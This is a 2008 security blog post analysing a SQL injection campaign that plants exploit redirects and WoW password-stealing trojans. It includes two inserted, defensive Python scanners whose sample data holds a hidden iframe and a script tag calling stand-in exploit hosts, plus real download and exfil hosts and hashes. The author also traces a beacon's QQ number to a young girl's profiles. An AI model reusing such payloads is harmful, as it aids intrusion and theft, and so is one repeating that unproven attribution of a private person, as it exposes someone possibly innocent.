Nov 10 2008
So the Analyst’s Diary blog at viruslist.com has an article on a new mass SQL injection attack that injects redirects to browser exploits into .asp pages. The exploits drop one of two trojans that steal passwords and whatnot. Here is h.js:
WordPress won’t display the script. Basically, it loads an iframe that points to two separate URLs (these URLs contain browser exploits so don’t follow them):
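To make the injection pattern concrete, here is a small scanner for the kind of page the attack leaves behind: content that has picked up an off-site script tag or a hidden iframe pointing at an exploit host. This is an added example, not code from the original post or from the viruslist.com write-up. The host names exploit-a.example and exploit-b.example stand in for the two exploit URLs the post does not reproduce, and the sample page is constructed.

```python
import re
from urllib.parse import urlparse

# Hypothetical stand-ins for the two exploit hosts the post does not name.
ATTACK_HOSTS = {"exploit-a.example", "exploit-b.example"}

# Only script and iframe tags can pull remote code into the page, so those are
# the tags the injection has to use and the ones worth inspecting.
TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# width=0 / height=0 is the usual way an injected iframe is kept invisible.
ZERO_DIM_RE = re.compile(r"""\b(width|height)\s*=\s*["']?0+(?:px)?\b""", re.IGNORECASE)


def find_injections(html, site_host):
    """Return (tag, src, reasons) for every script/iframe whose src leaves the site.

    site_host is the hostname the page is legitimately served from; relative
    URLs and URLs on that host are treated as benign.
    """
    findings = []
    for m in TAG_RE.finditer(html):
        tag, attrs = m.group(1).lower(), m.group(2)
        src_m = SRC_RE.search(attrs)
        if not src_m:
            continue  # inline script or iframe without src: not a remote include
        src = src_m.group(1)
        host = urlparse(src).hostname  # None for relative URLs
        if host is None or host.lower() == site_host.lower():
            continue
        reasons = ["off-site " + tag]
        if tag == "iframe" and ZERO_DIM_RE.search(attrs):
            reasons.append("zero-size iframe")
        if host.lower() in ATTACK_HOSTS:
            reasons.append("known attack host")
        findings.append((tag, src, reasons))
    return findings


# Constructed sample: a normal catalog page with the two injected tags appended,
# the way mass SQL injection leaves them when it rewrites text columns.
SAMPLE_PAGE = """<html><head><title>Catalog</title>
<script src="/js/menu.js"></script></head>
<body><p>Widgets on sale</p>
<img src="http://cdn.shop.example/logo.gif">
<script src="http://exploit-a.example/h.js"></script>
<iframe src="http://exploit-b.example/index.htm" width=0 height=0></iframe>
</body></html>"""

if __name__ == "__main__":
    for tag, src, reasons in find_injections(SAMPLE_PAGE, "www.shop.example"):
        print(f"{tag:6} {src}  [{', '.join(reasons)}]")
```

Running it over the sample flags the h.js include and the hidden iframe and leaves the site's own menu script alone; the off-site check is the useful signal even before the attack hosts are known, since a catalog page has no business loading script from a domain it has never referenced.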
I can’t seem to get to either of these sites at the moment. I’ll try again later.
Update: I spent some time looking at this malware. The two pages listed earlier in this post contain iframes to browser plug-in exploits for RealPlayer and other typical vulnerabilities. The exploits attempt to load and run down.exe (e160f590d894a98474697ac0db987746, not packed, Delphi code), which in turn fetches hxxp://www.vvexe.com/haha/down.txt for the list of additional files to download: 1.exe (a7fc8c966fdeb550fe19aba3169569be, not packed, VC++), do.exe (5af5edaa2cebf1fed56ad36799b2c850) and cool.exe (18867d6de1a3a9241c14c22c19b51351, not packed, Delphi).
1.exe is a WoW trojan that captures passwords sent to grunt.wowchina.com and [kr|us|tw|eu].[version|logon].worldofwarcraft.com. It also looks for and attempts to disable many types of security software, and it sends the stolen credentials to an ASP page on www.yilu777.com.
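The hosts and hashes above are enough to write a simple detection for an infected machine on the network. The following is an added example, not code from the original post: it matches a connection log against the download host, the credential drop host and the four MD5s, and it treats contact with the WoW logon servers as normal traffic that only adds context if the same client later talks to www.yilu777.com. The log format and every line in it are constructed for the example, and the path s.asp on the exfil host is a placeholder since the post does not name the page.

```python
import hashlib
import re

# Indicators taken from the post.
DOWNLOAD_HOSTS = {"www.vvexe.com"}      # serves down.txt and the stage-2 binaries
EXFIL_HOSTS = {"www.yilu777.com"}       # receives the stolen WoW credentials via an ASP page
WOW_LOGON_HOSTS = {"grunt.wowchina.com"} | {
    f"{region}.{kind}.worldofwarcraft.com"
    for region in ("kr", "us", "tw", "eu")
    for kind in ("version", "logon")
}
KNOWN_MD5 = {
    "e160f590d894a98474697ac0db987746": "down.exe",
    "a7fc8c966fdeb550fe19aba3169569be": "1.exe",
    "5af5edaa2cebf1fed56ad36799b2c850": "do.exe",
    "18867d6de1a3a9241c14c22c19b51351": "cool.exe",
}


def classify_file(data):
    """Return the dropped-file name if data hashes to one of the listed MD5s, else None."""
    return KNOWN_MD5.get(hashlib.md5(data).hexdigest())


# Constructed log format: "<epoch> <client-ip> <dst-host> <method-or-dash> <path-or-dash>".
# The WoW logon protocol is not HTTP, so those records carry "-" in the last two fields.
LOG_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s*$")


def scan_connection_log(lines):
    """Return (client, kind, host+path) alerts for traffic matching the indicators."""
    alerts = []
    saw_wow_logon = set()  # clients seen talking to a legitimate WoW logon host
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash on them
        _ts, client, host, method, path = m.groups()
        host = host.lower()
        if host in WOW_LOGON_HOSTS:
            # Normal traffic: the trojan only listens on it. Remember the client for context.
            saw_wow_logon.add(client)
        elif host in DOWNLOAD_HOSTS:
            alerts.append((client, "stage-2 download", host + path))
        elif host in EXFIL_HOSTS:
            kind = "credential exfil"
            if client in saw_wow_logon:
                kind += " after WoW logon"
            alerts.append((client, kind, host + path))
    return alerts


# Constructed sample log: one infected client (10.0.0.5) and one clean one (10.0.0.9).
SAMPLE_LOG = [
    "1226300000 10.0.0.5 www.vvexe.com GET /haha/down.txt",
    "1226300010 10.0.0.5 www.vvexe.com GET /haha/1.exe",
    "1226300300 10.0.0.5 us.logon.worldofwarcraft.com - -",
    "1226300305 10.0.0.5 www.yilu777.com POST /s.asp",   # s.asp is a placeholder path
    "1226300400 10.0.0.9 www.google.com GET /",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for client, kind, where in scan_connection_log(SAMPLE_LOG):
        print(f"{client:10} {kind:32} {where}")
    print("unknown sample:", classify_file(b"constructed sample bytes"))
```

The logon hosts are deliberately not alerted on: they are Blizzard's own servers, and any WoW player on the network will contact them. The signal is the follow-up request to the exfil host, which is why the scanner carries the "after WoW logon" context through to the alert.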
do.exe is a little more interesting. It appears to be a generic remote access trojan that sends a beacon to QQ number 58836533. A quick search for that QQ number revealed that this person’s Paipai account has been frozen:
So I do some more digging and find the QQ profile with a name and nick:
Searching for the nickname got me to a few blogs and profiles belonging to a young girl who is really into anime. Maybe her QQ account got pwn3d, or maybe, just maybe, she is a member of “China Girl Security”. I tried to add that QQ account so I could talk to the hacker but didn’t have any luck.
Note to Chinese hackers: Please pay the tax on your WoW gold profits.
One Response to “Chinese hackers will do anything for your WoW password (updated)”